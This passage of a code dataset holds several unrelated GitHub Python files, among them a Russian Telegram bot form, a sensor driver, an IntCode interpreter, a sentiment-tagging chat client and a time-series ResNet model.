expert_2 handler\")\r\n\r\n\r\n@dp.callback_query_handler(state='expert_3')\r\nasync def expert_2_1(call: CallbackQuery, state: FSMContext):\r\n user_id = call.from_user.id\r\n\r\n if call.data == 'other':\r\n await call.message.answer(\"Напишите название вашего дивизиона:\")\r\n await call.message.edit_reply_markup()\r\n await state.set_state('expert_3.1')\r\n else:\r\n db.update_user('experts', 'division', user_id, divisions_list[int(call.data)])\r\n await call.answer(cache_time=5)\r\n await call.message.answer(text=\"Расскажите о своей экспертизе\\n\\n\"\r\n \"Пример: Разрабатываю frontend-часть enterprise веб-приложений и пользовательские \"\r\n \"элементы управления. Свободно владею HTML5, CSS3 (LESS/SASS), DOM, \"\r\n \"JavaScript/TypeScript. Имею опыт работы с Angular/React/Vue.js, работаю с Git, \"\r\n \"BootsTrap. Знаю принципы и технологии веб-сайтов, асинхронных веб-приложений, MVC, \"\r\n \"Razor, http-интерфейсы, умею работать с графическими редакторами, читаю код на \"\r\n \"C# и Java\",\r\n disable_notification=True)\r\n await call.message.edit_reply_markup()\r\n await state.set_state('expert_5')\r\n logger.debug(f\"Expert {user_id} entered expert_2_1 handler with cd {call.data}\")\r\n\r\n\r\n@dp.message_handler(state='expert_3.1')\r\nasync def expert_3(message: Message, state: FSMContext):\r\n user_id = message.from_user.id\r\n\r\n db.update_user('experts', 'wr_division', user_id, message.text)\r\n await message.answer(text=\"Расскажите о своей экспертизе\\n\\n\"\r\n \"Пример: Разрабатываю frontend-часть enterprise веб-приложений и пользовательские \"\r\n \"элементы управления. Свободно владею HTML5, CSS3 (LESS/SASS), DOM, \"\r\n \"JavaScript/TypeScript. Имею опыт работы с Angular/React /Vue.js, работаю с Git, \"\r\n \"BootsTrap. Знаю принципы и технологии веб-сайтов, асинхронных веб-приложений, MVC, \"\r\n \"Razor, http-интерфейсы, умею работать с графическими редакторами, читаю код на \"\r\n \"C# и Java\",\r\n disable_notification=True)\r\n await state.set_state('expert_5')\r\n logger.debug(f\"Expert {user_id} entered expert_3 handler\")\r\n\r\n\r\n@dp.message_handler(state='expert_4')\r\nasync def expert_4(message: Message, state: FSMContext):\r\n user_id = message.from_user.id\r\n\r\n db.update_user('experts', 'position', user_id, message.text)\r\n await message.answer(text=\"Расскажите о своей экспертизе\\n\\n\"\r\n \"Пример: Разрабатываю frontend-часть enterprise веб-приложений и пользовательские \"\r\n \"элементы управления. Свободно владею HTML5, CSS3 (LESS/SASS), DOM, \"\r\n \"JavaScript/TypeScript. Имею опыт работы с Angular/React /Vue.js, работаю с Git, \"\r\n \"BootsTrap. Знаю принципы и технологии веб-сайтов, асинхронных веб-приложений, MVC, \"\r\n \"Razor, http-интерфейсы, умею работать с графическими редакторами, читаю код на \"\r\n \"C# и Java\",\r\n disable_notification=True)\r\n await state.set_state('expert_5')\r\n logger.debug(f\"Expert {user_id} entered expert_4 handler\")\r\n\r\n\r\n@dp.message_handler(state='expert_5')\r\nasync def expert_5(message: Message, state: FSMContext):\r\n user_id = message.from_user.id\r\n\r\n db.update_user('experts', 'profile', user_id, message.text)\r\n await message.answer(text=\"С удовольствием поговорю на следующие темы:\",\r\n reply_markup=topics_kb(),\r\n disable_notification=True)\r\n\r\n await state.set_state('expert_6')\r\n logger.debug(f\"Expert {user_id} entered expert_5 handler\")\r\n\r\n\r\n@dp.callback_query_handler(state='expert_6')\r\nasync def expert_6(call: CallbackQuery, state: FSMContext):\r\n user_id = call.from_user.id\r\n\r\n cdata = call.data\r\n if cdata != 'done': # if user don't press \"Done\" button\r\n async with state.proxy() as data:\r\n if 'list' in data: # if it is not first click on button and list is not exist\r\n if int(cdata) in data['list']: # if button is already chosen\r\n data['list'].remove(int(cdata))\r\n else:\r\n data['list'].append(int(cdata))\r\n else:\r\n data['list'] = [int(cdata)]\r\n sdata = await state.get_data()\r\n await call.message.edit_reply_markup(topics_kb(sdata['list']))\r\n await state.set_state('expert_6')\r\n else:\r\n sdata = await state.get_data()\r\n if sdata.get('list') is None or not sdata['list']: # if user did not choose any button\r\n await call.answer()\r\n await call.message.answer('Пожалуйста, выберите минимум одну тему.')\r\n await state.set_state('expert_6')\r\n else:\r\n await call.message.edit_reply_markup()\r\n\r\n db.update_user('experts', 'topics', user_id, str(sdata['list'])[1:-1])\r\n username = db.get_expert(user_id)[2]\r\n if not username:\r\n await call.message.answer(text=\"Напишите ваше имя пользователя (username) в Telegram. \"\r\n \"Если вы его не знаете, перейдите в «Настройки», затем нажмите \"\r\n \"на «Изменить профиль» (инструкция на изображениях ниже).\\n\\n\"\r\n \"Формат: @anthonytech\")\r\n await bot.send_photo(chat_id=user_id,\r\n photo='https://i.ibb.co/7Gbg9c8/1.png',\r\n disable_notification=True)\r\n await bot.send_photo(chat_id=user_id,\r\n photo='https://i.ibb.co/m4Cmx9C/2.png',\r\n disable_notification=True)\r\n await bot.send_photo(chat_id=user_id,\r\n photo='https://i.ibb.co/hdBN7Bm/3.png',\r\n disable_notification=True)\r\n await bot.send_photo(chat_id=user_id,\r\n photo='https://i.ibb.co/f9yjs6Z/4.png',\r\n disable_notification=True)\r\n await state.set_state('expert_7')\r\n else:\r\n await call.message.answer(\"Нажмите \\\"Да\\\", чтобы мы могли показывать ваши контактные данные в телеграм \"\r\n f\"(@{call.from_user.username}) соискателям. Так они смогут связаться с вами, \"\r\n \"если проблема с конференцией. Если вы не хотите, \"\r\n \"чтобы вам писали соискатели, нажмите \\\"Нет\\\"\",\r\n reply_markup=kb2b(\"Да\", \"set_agreement_to_show_contacts_yes\",\r\n \"Нет\", \"set_agreement_to_show_contacts_no\"))\r\n await state.set_state('expert_8')\r\n logger.debug(f\"Expert {user_id} entered expert_6 handler with cd {call.data} and sd {sdata}\")\r\n\r\n\r\n@dp.message_handler(state='expert_7')\r\nasync def expert_7(message: Message, state: FSMContext):\r\n user_id = message.from_user.id\r\n\r\n text = message.text\r\n if text[0] == '@':\r\n db.update_user('experts', 'wr_username', user_id, message.text[1:].rstrip())\r\n\r\n await message.answer(\"Нажмите \\\"Да\\\", чтобы мы могли показывать ваши контактные данные в телеграм \"\r\n f\"(@{message.from_user.username}) соискателям. Так они смогут связаться с вами, если \"\r\n \"проблема с конференцией. Если вы не хотите, \"\r\n \"чтобы вам писали соискатели, нажмите \\\"Нет\\\"\",\r\n reply_markup=kb2b(\"Да\", \"yes\", \"Нет\", \"no\"))\r\n await state.set_state('expert_8')\r\n else:\r\n await message.answer(text=\"Пожалуйста, напишите свой username корректно, начиная с '@'\",\r\n disable_notification=True)\r\n await state.set_state('expert_7')\r\n logger.debug(f\"Expert {user_id} entered expert_7 handler with message: {text}\")\r\n\r\n\r\n@dp.callback_query_handler(state='expert_8')\r\nasync def expert_8(call: CallbackQuery, state: FSMContext):\r\n user_id = call.from_user.id\r\n\r\n if \"yes\" == call.data:\r\n agree_to_show_contacts = True\r\n else:\r\n agree_to_show_contacts = False\r\n db.update_user('experts', 'agree_to_show_contacts', user_id, agree_to_show_contacts)\r\n\r\n await call.message.edit_reply_markup()\r\n await call.message.answer(\"Поздравляем, вы заполнили анкету. \"\r\n \"Теперь дело за модераторами. Они рассмотрят Вашу анкету и \"\r\n \"в ближайшее время предоставят Вам функционал бота или отправят анкету на доработку\")\r\n db.update_user('experts', 'status', user_id, \"На модерации\")\r\n await state.finish()\r\n\r\n logger.debug(f\"Expert {user_id} entered expert_8 handler with cd {call.data}\")\r\n","repo_name":"Barashkis/BuddyCoffee","sub_path":"handlers/expert_form.py","file_name":"expert_form.py","file_ext":"py","file_size_in_byte":13396,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"40142739192","text":"import re\n\nimport pyastyle\nimport pytest\n\n\ndef test_version_is_string():\n ver = pyastyle.version()\n assert isinstance(ver, str)\n\n\ndef test_version_is_numberic_like():\n ver = pyastyle.version()\n assert re.match(r'^(\\d+\\.){2,}(\\d+\\w?)$', ver)\n\n\ndef test_format_simple_code():\n code = '''\\\nint main(void)\n{\n }'''\n expected = '''\\\nint main(void)\n{\n}'''\n assert expected == pyastyle.format(code, '--style=allman')\n\n\ndef test_format_invalid_options():\n with pytest.raises(pyastyle.error) as exc:\n pyastyle.format('int main() {}', '--invalid-options-hereXXXXXX')\n assert '[130]' in str(exc)\n","repo_name":"timonwong/pyastyle","sub_path":"tests/test_pyastyle.py","file_name":"test_pyastyle.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"4"} +{"seq_id":"10251327296","text":"#...................Drive a pressure/temperature sensor..................\r\n#Author: James Bramante\r\n#Date: May 8, 2017\r\n\r\nimport ms5837\r\nimport threading\r\nimport time\r\nimport statistics as stats\r\n\r\nclass SensorDriver(object):\r\n\r\n def __init__(self, samplerate = 100., density = 997., baseTime = 0.):\r\n \"\"\" Constructor\r\n\r\n :type samplerate: float\r\n :type density: float\r\n\r\n :param samplerate: rate at which to sample the pressure sensor, in Hz\r\n :param density: density of the water, kg m^-3\r\n \"\"\"\r\n\r\n #Parse the input parameters\r\n self.samplerate = samplerate\r\n self.density = density\r\n\r\n #FINAL variables\r\n self.I2CBUS = 1\r\n self.GRAV = 9.81\r\n\r\n #Initialize the sensor\r\n self.sensor = ms5837.MS5837_30BA()\r\n test1 = self.sensor.init()\r\n test2 = self.sensor.read()\r\n self.initialized = test1 & test2\r\n self.running = False\r\n\r\n #Initialize output variables\r\n if (baseTime == 0.):\r\n self.baseTime = time.time()\r\n else:\r\n self.baseTime = baseTime\r\n \r\n self.basepress = []\r\n for x in range(1,10):\r\n self.sensor.read()\r\n self.basepress += [self.sensor.pressure()]\r\n time.sleep(0.3)\r\n self.basepress = stats.mean(self.basepress)\r\n self.time = [time.time()-self.baseTime]\r\n self.temp = [self.sensor.temperature()]\r\n self.press = [self.basepress]\r\n self.depth = [0]\r\n\r\n def daemonize(self):\r\n #Daemonize the run function and thread it\r\n self.thread = threading.Thread(target=self.run,args=(),daemon=True)\r\n self.thread.start()\r\n\r\n #Collects sensor data in the background\r\n def run(self):\r\n\r\n self.running = True\r\n while self.running:\r\n #Produce pressure and temperature and depth data\r\n self.sensor.read()\r\n self.time += [time.time()-self.baseTime]\r\n self.temp += [self.sensor.temperature()]\r\n self.press += [self.sensor.pressure()]\r\n self.depth += [(self.sensor.pressure() - self.basepress)/self.density/self.GRAV]\r\n\r\n #Wait designated interval\r\n time.sleep(1/self.samplerate)\r\n\r\n #Stop sampling data\r\n def stop(self):\r\n self.running = False\r\n\r\n #Reset the sensor and start recording again, but keep parameters\r\n def reset(self):\r\n self.running = False\r\n\r\n #Re-initialize the sensor\r\n self.sensor = ms5837.MS5837_30BA()\r\n self.sensor.init()\r\n\r\n #Re-initialize everything\r\n self.baseTime = time.time()\r\n self.basepress = []\r\n for x in range(1,10):\r\n self.sensor.read()\r\n self.basepress += [self.sensor.pressure()]\r\n time.sleep(0.3)\r\n self.basepress = stats.mean(self.basepress)\r\n self.time = [time.time()-self.baseTime]\r\n self.temp = [self.sensor.temperature()]\r\n self.press = [self.basepress]\r\n self.depth = [0]\r\n\r\n #Restart the recording thread\r\n self.daemonize()\r\n\r\n #Reset the recorded times to a new time origin\r\n def resetClock(self):\r\n newTime = time.time()\r\n self.time -= (newTime - self.baseTime)\r\n self.baseTime = newTime\r\n\r\n #Set parameter values\r\n def setDensity(self,den):\r\n self.density = den\r\n\r\n def setSamplerate(self,rat):\r\n self.samplerate = rat\r\n\r\n #Read recorded values and reset the variables doing it\r\n def readValues(self):\r\n #Make sure all of the data lines up\r\n t = self.time\r\n tempLength = len(t)-1\r\n p = self.press[:tempLength]\r\n T = self.temp[:tempLength]\r\n d = self.depth[:tempLength]\r\n \r\n #Only keep the data that will not have been reported yet\r\n tempLength += 1\r\n self.time = self.time[tempLength:]\r\n self.press = self.press[tempLength:]\r\n self.temp = self.temp[tempLength:]\r\n self.depth = self.depth[tempLength:]\r\n \r\n return (t,p,T,d)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n","repo_name":"BramanTyphoon/Abrasion_GUI","sub_path":"sensor_driver.py","file_name":"sensor_driver.py","file_ext":"py","file_size_in_byte":4114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"26769143105","text":"\"\"\"\nUloha: Napiste program, ktory vypocita faktorial zadaneho cisla pomocou cyklov for a while.\n\"\"\"\n\n\ndef for_factorial(num):\n \"\"\"\n Vypocet faktorialu pomocou for cyklu\n\n :param num: cislo, ktoreho faktorial pocitame\n :return: vypocitany faktorial\n \"\"\"\n\n for_fact = 1\n\n for i in range(num, 0, -1):\n for_fact *= i\n\n return for_fact\n\n\ndef while_factorial(num):\n \"\"\"\n Vypocet faktorialu pomocou while cyklu\n\n :param num: cislo, ktoreho faktorial pocitame\n :return: vypocitany faktorial\n \"\"\"\n\n while_fact = 1\n\n while num > 0:\n while_fact *= num\n num -= 1\n\n return while_fact\n\n\n# nacitanie cisla a nasledny vypis jeho faktorialu\nnumber = int(input(\"Enter number: \"))\nprint(\"Vypocitany faktorial pomocou for cyklu: \", for_factorial(number))\nprint(\"Vypocitany faktorial pomocou while cyklu: \", while_factorial(number))","repo_name":"ZalGe/Prax_Python-MTF_STU_2023","sub_path":"factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"sk","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"73330403957","text":"from threading import Condition\nfrom threading import Thread\nfrom collections import deque\n\nclass BoundedBlockingQueue(object):\n\n def __init__(self, capacity: int):\n self.max_size = capacity\n self.curr_size = 0\n self.cond = Condition()\n self.q = deque()\n \n\n def enqueue(self, element: int) -> None:\n \n self.cond.acquire()\n while self.curr_size == self.max_size:\n self.cond.wait()\n \n self.q.append(element)\n self.curr_size += 1\n self.cond.notifyAll()\n self.cond.release()\n\n def dequeue(self) -> int:\n \n self.cond.acquire()\n while self.curr_size == 0:\n self.cond.wait()\n \n returned_element = self.q.popleft()\n self.curr_size -= 1\n self.cond.notifyAll()\n self.cond.release()\n \n return returned_element\n \n def size(self) -> int:\n return self.curr_size","repo_name":"irupawala/Ibrahim-List","sub_path":"Submits/Multithreading/[5] Design a Bounded Blocking Queue/Leetcode #1188.py","file_name":"Leetcode #1188.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"41991689013","text":"from collections import Counter\nfrom math import *\n\n\nextra = [\"'\", '\"', ',', ':', ')', '(', '=', '-',\n '_', '+', '*', '&', '^', '%', '$', '#', '@', '!', '<', '>',\n '}', '{', '[', ']', '`', '`', \"/\", \";\"]\n\n\ndef docfreq(text):\n text_list = text.split()\n counter = Counter()\n for word in text_list:\n counter[word] += 1\n return counter\n \ndef inv_doc_freq(text, word, length):\n #idf = {}\n #for word in docfreq(text).keys:\n #idf[word] = log10(length/docfreq(text)[word])\n idf = log10(length/docfreq(text)[word])\n return idf\n\ndef word_weight(text):\n weights = {}\n for letter in text:\n if letter in extra:\n text = text.replace(letter, '')\n if letter == '.':\n text = text.replace(letter, ' ')\n splits = text.split()\n length = len(splits)\n for word in splits:\n weights[word] = log(1 + docfreq(text)[word])\\\n * log10(inv_doc_freq(text, word, length))\n return weights\n\n#def score(x):\n \n\n#def lookuptext(text):\n","repo_name":"chungs1/tldr","sub_path":"tf_idf.py","file_name":"tf_idf.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"70070810996","text":"class Solution:\n def spiralOrder(self, matrix):\n self.matrix = matrix\n self.height = len(matrix) - 1\n self.lenght = len(matrix[0])\n \n self.i = 0\n self.j = 0\n self.result = []\n self.counter = len(matrix) * len(matrix[0])\n while self.counter > 0:\n self.right()\n self.i += 1\n self.lenght -= 1\n self.down()\n self.j -= 1\n self.height -= 1\n self.left()\n self.i -= 1\n self.lenght -= 1\n self.up()\n self.j += 1\n self.height -= 1\n return self.result\n \n def right(self):\n if self.counter <= 0:\n return\n for x in range(self.lenght):\n self.result.append(self.matrix[self.i][self.j])\n self.counter -= 1\n self.j += 1\n self.j -= 1\n return\n \n def left(self):\n if self.counter <= 0:\n return\n for x in range(self.lenght):\n self.result.append(self.matrix[self.i][self.j])\n self.counter -= 1\n self.j -= 1\n self.j += 1\n return\n \n def down(self):\n if self.counter <= 0:\n return\n for x in range(self.height):\n self.result.append(self.matrix[self.i][self.j])\n self.counter -= 1\n self.i += 1\n self.i -= 1\n return\n \n def up(self):\n if self.counter <= 0:\n return\n for x in range(self.height):\n self.result.append(self.matrix[self.i][self.j])\n self.counter -= 1\n self.i -= 1\n self.i += 1\n return\n\nmatrix = [[1,2,3,4],[5,6,7,8],[9,10,11,12]]\nd = Solution()\nprint(d.spiralOrder(matrix))","repo_name":"juanpedrovel/bomboclap","sub_path":"algorithms_and_data_structures/arrays/Spiral Order.py","file_name":"Spiral Order.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"20189195980","text":"from pathlib import Path\nfrom copy import deepcopy\n\nclass IntCode:\n def __init__(self, program):\n self.program = program\n\n def parse(self):\n return list(map(int, deepcopy(self.program).strip().split(\",\")))\n\n def pad(self, value, length):\n diff = (length + 1)- len(value)\n return value + (\"0\" * diff)\n\n def get_mode(self, modes, offset):\n mode_offset = offset - 1\n if mode_offset >= len(modes):\n modes = self.pad(modes, mode_offset)\n\n return int(modes[mode_offset])\n\n def get_value(self, state, position, offset, modes):\n mode = self.get_mode(modes, offset)\n value = None\n if mode == 0:\n value_position = state[position + offset]\n try:\n value = state[value_position]\n\n except Exception as e:\n print(f\"ERROR position[0]={position + offset}, {len(state)}\")\n\n elif mode == 1:\n try:\n value = state[position + offset]\n\n except Exception as e:\n print(f\"ERROR position[1]={position + offset}, {len(state)}\")\n\n else:\n print(f\"ERROR: modes={mode}, {modes}\")\n\n return value\n\n def set_value(self, state, position, offset, value):\n result_position = state[position + offset]\n state[result_position] = value\n\n def run(self, debug=False, quiet=False):\n state = self.parse()\n position = 0\n outputs = list()\n while True:\n settings = str(state[position])\n modes, opcode = settings[:-2][::-1], int(settings[-2:])\n\n if opcode == 1:\n input1 = self.get_value(state, position, 1, modes)\n input2 = self.get_value(state, position, 2, modes)\n self.set_value(state, position, 3, input1 + input2)\n position = position + 4\n\n elif opcode == 2:\n input1 = self.get_value(state, position, 1, modes)\n input2 = self.get_value(state, position, 2, modes)\n self.set_value(state, position, 3, input1 * input2)\n position = position + 4\n\n elif opcode == 3:\n self.set_value(state, position, 1, int(input(\"> \")))\n position = position + 2\n\n elif opcode == 4:\n input1 = self.get_value(state, position, 1, modes)\n if not quiet:\n print(f\"-> {input1}\")\n\n outputs.append(input1)\n position = position + 2\n\n elif opcode == 5:\n input1 = self.get_value(state, position, 1, modes)\n input2 = self.get_value(state, position, 2, modes)\n if input1 != 0:\n position = input2\n\n else:\n position = position + 3\n\n elif opcode == 6:\n input1 = self.get_value(state, position, 1, modes)\n input2 = self.get_value(state, position, 2, modes)\n if input1 == 0:\n position = input2\n\n else:\n position = position + 3\n\n elif opcode == 7:\n input1 = self.get_value(state, position, 1, modes)\n input2 = self.get_value(state, position, 2, modes)\n self.set_value(state, position, 3, 1 if input1 < input2 else 0)\n position = position + 4\n\n elif opcode == 8:\n input1 = self.get_value(state, position, 1, modes)\n input2 = self.get_value(state, position, 2, modes)\n self.set_value(state, position, 3, 1 if input1 == input2 else 0)\n position = position + 4\n\n elif opcode == 99:\n break\n\n else:\n print(f\"ERROR: {position}, {opcode}\")\n break\n\n if debug:\n return state\n\n return outputs\n\nif __name__ == \"__main__\":\n ic = IntCode(Path(\"../etc/aoc5.txt\").read_text())\n\n result1 = ic.run(quiet=True)\n print(\"Part 1\", result1[-1])\n\n result2 = ic.run(quiet=True)\n print(\"Part 2\", result2[-1])\n","repo_name":"aewens/aoc19","sub_path":"py/aoc5.py","file_name":"aoc5.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"43606122173","text":"# -*- coding=utf-8 -*-\n\nimport json\nfrom hashlib import md5\n\nfrom tyframework.context import TyContext\nfrom tysdk.entity.paythird.helper import PayHelper\n\n\nclass MockZhangyue(object):\n @classmethod\n def __calc_callback_sign(cls, rparam):\n paykey_dict = TyContext.Configure.get_global_item_json('zhangyue_paykeys', {})\n paykey = str(paykey_dict[rparam['appId']])\n transData = rparam['transData']\n check_str = (rparam['merId'] + '|' +\n rparam['appId'] + '|' +\n transData['orderId'] + '|' +\n transData['payAmt'] + '|' +\n paykey)\n m = md5()\n m.update(check_str)\n digest = m.hexdigest().lower()\n return digest\n\n @classmethod\n def mock(cls, params):\n ''' args: paytype, pay version (v1/v3), platformOrderId, price,\n expect (expected result) '''\n\n postparams = {}\n transData = {}\n postparams['appId'] = '3e02f7a3e7fd2ca62cc3'\n postparams['merId'] = '691'\n transData['orderId'] = '11133'\n transData['merOrderId'] = params['platformOrderId']\n transData['payAmt'] = params['price']\n postparams['transData'] = transData\n transData['md5SignValue'] = cls.__calc_callback_sign(postparams)\n postparams['transData'] = json.dumps(transData)\n cburl = PayHelper.getSdkDomain() + '/v1/pay/zhangyue/callback'\n # use GET instead of POST for now\n response, _ = TyContext.WebPage.webget(cburl, postdata_=postparams)\n return 'zhangyue ok'\n","repo_name":"csirui/hall0","sub_path":"source/tygame-sdk/src/tysdk/entity/mock/mockzhangyue.py","file_name":"mockzhangyue.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"7305172132","text":"from socket import AF_INET, socket, SOCK_STREAM\nfrom threading import Thread\nimport tkinter\nfrom PIL import ImageTk ,Image\n\nimport pickle\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_hub as hub\nimport tensorflow_datasets as tfds\n\nc=0\n\nnew_model = tf.keras.models.load_model('saved_model\\my_model')\nmodel=new_model\n\n\ndef nlp(msg1):\n sentiment=\"\"\n predictions = model.predict(tf.expand_dims(msg1, 0))\n if(predictions>=0.5):\n sentiment='Positive'\n else:\n sentiment='Negative'\n return sentiment\n\ndef receive():\n \"\"\"Handles receiving of messages.\"\"\"\n while True:\n try:\n msg = client_socket.recv(BUFSIZ).decode(\"utf8\")\n msg_list.insert(tkinter.END, msg)\n except OSError: # Possibly client has left the chat.\n break\n\ndef send(event=None): # event is passed by binders.\n \"\"\"Handles sending of messages.\"\"\"\n msg = my_msg.get()\n my_msg.set(\"\") # Clears input field.\n global c\n if(c==0):\n client_socket.send(bytes(msg, \"utf8\"))\n my_msg.set(\"\") # Clears input field.\n c=c+1\n else:\n mood=nlp(msg)\n msg2=msg+\"(\"+mood+\")\"\n my_msg.set(\"\") # Clears input field.\n client_socket.send(bytes(msg2, \"utf8\"))\n if msg == \"{quit}\":\n client_socket.close()\n top.quit()\n\n\ndef on_closing(event=None):\n \"\"\"This function is to be called when the window is closed.\"\"\"\n my_msg.set(\"{quit}\")\n send()\ntop = tkinter.Tk()\ntop.title(\"TextaPhone\")\n\nsendphoto = ImageTk.PhotoImage(Image.open (\"SEND.png\") )\n\nmessages_frame = tkinter.Frame(top)\nmy_msg = tkinter.StringVar() # For the messages to be sent.\nscrollbar = tkinter.Scrollbar(messages_frame) # To navigate through past messages.\n# Following will contain the messages.\nmsg_list = tkinter.Listbox(messages_frame, height=30, width=70, yscrollcommand=scrollbar.set, bd =3 )\nscrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)\nmsg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)\nmsg_list.pack()\nmessages_frame.pack()\n\nentry_field = tkinter.Entry(top, textvariable=my_msg, bd =5, width=50)\nentry_field.bind(\"\", send)\nentry_field.pack(side = tkinter.LEFT, padx=50)\nsend_button = tkinter.Button(top, text=\"Send\", command=send, image = sendphoto, bd=0)\nsend_button.pack()\ntop.protocol(\"WM_DELETE_WINDOW\", on_closing)\n\n\n#----Now comes the sockets part----\nHOST = '127.0.0.1'\nPORT = '33000'\nif not PORT:\n PORT = 33000\nelse:\n PORT = int(PORT)\n\nBUFSIZ = 1024\nADDR = (HOST, PORT)\n\nclient_socket = socket(AF_INET, SOCK_STREAM)\nclient_socket.connect(ADDR)\n\nreceive_thread = Thread(target=receive)\nreceive_thread.start()\n\ntkinter.mainloop() # Starts GUI execution.","repo_name":"bhagyeshrane/twomodecalling","sub_path":"textonly.py","file_name":"textonly.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"15307168781","text":"\n\n\np = dict(\n seq_len = 36, #32\n criterion = nn.MSELoss(),\n n_feature_maps=36,\n max_epochs = 200,\n learning_rate = 0.004,\n)\n\n\nclass TSResnet(pl.LightningModule):\n def __init__(self, \n input_size,\n output_size,\n learning_rate = p[\"learning_rate\"],\n n_feature_maps = p[\"n_feature_maps\"],\n criterion=nn.MSELoss()):\n super(TSResnet, self).__init__()\n \n self.input_size = input_size\n self.output_size = output_size\n self.learning_rate = learning_rate\n self.criterion = criterion\n self.n_feature_maps = n_feature_maps\n self.activation = nn.ReLU()\n self.block1 = conv_block(self.input_size, self.n_feature_maps)\n self.shortcut1conv = nn.Conv1d(self.input_size, self.n_feature_maps, 1)\n self.shortcut1bn = nn.BatchNorm1d(self.n_feature_maps)\n\n self.block2 = conv_block(self.n_feature_maps, 2*self.n_feature_maps)\n self.shortcut2conv = nn.Conv1d(self.n_feature_maps, 2*self.n_feature_maps, 1)\n self.shortcut2bn = nn.BatchNorm1d(2*self.n_feature_maps)\n \n self.block3 = conv_block(2*self.n_feature_maps, 2*self.n_feature_maps)\n self.shortcut3bn = nn.BatchNorm1d(2*self.n_feature_maps)\n self.adavgpool = nn.AdaptiveAvgPool1d(36)\n self.avgpool = nn.AvgPool1d(36)\n self.linear1 = nn.Linear(2*self.n_feature_maps, self.n_feature_maps)\n self.drop = nn.Dropout(0.8)\n self.linear2 = nn.Linear(self.n_feature_maps, self.output_size)\n\n\n def forward(self, x):\n convz = self.block1(x)\n shortcuty = self.shortcut1conv(x)\n shortcuty = self.shortcut1bn(shortcuty)\n output_block1 = convz+shortcuty\n output_block1 = self.activation(output_block1)\n \n convz = self.block2(output_block1)\n shortcuty = self.shortcut2conv(output_block1)\n shortcuty = self.shortcut2bn(shortcuty)\n output_block2 = convz+shortcuty\n output_block2 = self.activation(output_block2)\n \n convz = self.block3(output_block2)\n shortcuty = self.shortcut2bn(output_block2)\n output_block3 = convz+shortcuty\n output_block3 = self.activation(output_block3)\n\n # adpooled = self.adavgpool(output_block3)\n # print(\"pooled\", adpooled.shape)\n pooled = self.avgpool(output_block3)\n # print(\"pooled\", pooled.shape)\n output =self.linear1(pooled.reshape(pooled.shape[0],-1))\n output =self.drop(output)\n y_pred = self.linear2(output)\n return y_pred\n\n \n def configure_optimizers(self):\n optimizer = torch.optim.Adam(self.parameters(), lr=self.learning_rate)\n lr_lambda = lambda epoch: .9**epoch\n scheduler = torch.optim.lr_scheduler.MultiplicativeLR(optimizer,\n lr_lambda=lr_lambda,\n verbose=True)\n return {\n 'optimizer': optimizer,\n 'lr_scheduler': scheduler,\n }\n\n def training_step(self, batch, batch_idx):\n x, y = batch\n x = torch.squeeze(x).float() \n y = torch.squeeze(y).float() \n y_hat = self.forward(x)\n loss = self.criterion(y.float(), y_hat)\n self.log(\"train/mse\", loss, on_step=False, on_epoch=True, prog_bar=False, logger=True)\n # self.logger.experiment.add_scalars(\"losses\", {\"train_loss\": loss})\n return {\"loss\":loss, \"mse\":loss, \"step\":self.current_epoch}\n\n def validation_step(self, batch, batch_idx):\n x, y = batch \n x = torch.squeeze(x).float() \n y = torch.squeeze(y).float() \n y_hat = self.forward(x)\n loss = self.criterion(y.float(), y_hat)\n self.log(\"val/mse\", loss, on_step=False, on_epoch=True)\n return {\"val_mse\":loss, \"step\":self.current_epoch}\n\n\n def training_epoch_end(self, outputs):\n avg_mse = torch.stack([x['mse'] for x in outputs]).mean()\n avg_step = np.mean([x['step'] for x in outputs])\n tensorboard_logs = {'train/loss': avg_mse}\n self.logger.experiment.add_scalars(\"metrics\", {\"tr_rmse\": avg_mse}, global_step=avg_step)\n\n def validation_epoch_end(self, outputs):\n avg_mse = torch.stack([x['val_mse'] for x in outputs]).mean()\n avg_step = np.mean([x['step'] for x in outputs])\n tensorboard_logs = {'val/loss': avg_mse}\n self.logger.experiment.add_scalars(\"metrics\", {\"val_mse\": avg_mse}, global_step=avg_step)\n\n def test_step(self, batch, batch_idx):\n x, y = batch \n x = torch.squeeze(x).float() \n y = torch.squeeze(y).float() \n y_hat = self(x)\n loss = self.criterion(y_hat, y)\n self.log(\"test/mse\", loss, on_step=False, on_epoch=True)\n return {\"test_loss\": loss}\n\n\n\n","repo_name":"marcalph/stuff","sub_path":"ts/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":4884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"70911271476","text":"import boto3\n\ns3 = boto3.client('s3')\n\n# 1.- Realizamos la consulta mediante S3Select\nresp = s3.select_object_content(\n Bucket='iabd-boto3',\n Key='TMDb_updated.csv',\n ExpressionType='SQL',\n Expression=\"SELECT s.title, s.overview, s.vote_count, s.vote_average FROM s3object s WHERE cast(s.vote_count as int)> 10000\",\n InputSerialization={'CSV': {\"FileHeaderInfo\": \"USE\",\n 